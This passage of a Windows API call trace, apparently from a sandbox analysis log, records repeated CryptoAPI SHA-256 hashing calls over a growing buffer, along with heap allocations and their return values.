phProv=0xce530*=0x338228d0) returned 1 [0187.860] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.860] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0187.860] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e899d0 [0187.860] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.860] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.860] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.861] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.861] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0187.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89a90 [0187.861] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.861] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.861] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.862] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.862] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89ac0 [0187.862] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.862] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.862] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.862] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.862] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89d60 [0187.862] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.862] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.862] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.863] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.863] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0187.863] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89ca0 [0187.863] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.863] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.863] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.863] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.864] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89b50 [0187.864] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.864] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.864] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.864] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.864] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89ee0 [0187.864] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.864] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.864] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.865] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.865] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0187.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89e20 [0187.865] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.865] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.865] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.868] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.868] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0187.868] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89e50 [0187.868] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.868] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.868] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.869] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.869] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0187.869] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89e80 [0187.869] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.869] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.869] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.869] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.869] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0187.869] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a120 [0187.869] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.870] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.870] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.870] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.870] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89f10 [0187.870] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.870] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.870] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.871] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.871] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a0c0 [0187.871] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0187.871] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.871] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.871] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.872] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89d00 [0187.872] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.872] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.872] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.872] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.872] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0187.872] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89b80 [0187.872] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.872] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.872] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.873] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.873] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0187.873] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89fd0 [0187.873] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.873] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.873] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.874] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.874] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89fa0 [0187.874] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.874] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.874] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.874] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.874] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a000 [0187.874] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.874] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.874] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.875] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.875] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0187.875] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89d90 [0187.875] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.875] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.875] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0187.875] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.876] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0187.876] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89eb0 [0187.876] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.876] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0187.876] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.876] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.876] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0187.876] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89f40 [0187.876] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.876] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.876] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.877] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.877] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0187.877] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89dc0 [0187.877] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.877] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.877] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.877] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.877] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0187.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89bb0 [0187.878] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.878] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.878] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.878] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.878] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0187.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89f70 [0187.878] CryptDestroyHash (hHash=0x3396f350) returned 1 [0187.878] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.878] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.879] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.879] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0187.879] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a030 [0187.879] CryptDestroyHash (hHash=0x3396f270) returned 1 [0187.879] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.879] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.880] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.880] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0187.880] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a060 [0187.880] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.880] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.880] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.881] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.881] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0187.881] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a090 [0187.881] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.881] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.881] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.883] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.883] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89c10 [0187.883] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.884] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.884] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.884] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.884] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89df0 [0187.884] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.884] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.884] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0187.885] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.885] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0187.885] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89af0 [0187.885] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.885] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0187.885] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0187.885] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.885] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0187.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a0f0 [0187.886] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.886] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0187.886] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.886] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.886] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0187.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a150 [0187.886] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.886] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.886] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.887] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.887] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0187.887] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a180 [0187.887] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.887] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.887] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.917] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.917] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a1b0 [0187.918] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.918] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.918] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.918] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.918] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e8a1e0 [0187.918] CryptDestroyHash (hHash=0x3396f430) returned 1 [0187.918] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.918] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.919] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.919] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0187.919] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89b20 [0187.919] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.919] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.919] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.920] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.920] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0187.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89be0 [0187.920] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.920] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.920] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.920] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.920] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0187.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89c40 [0187.920] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.920] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.920] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.921] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.921] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0187.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89d30 [0187.921] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.921] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.921] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.922] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.922] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89c70 [0187.922] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.922] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.922] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.922] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.922] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89cd0 [0187.923] CryptDestroyHash 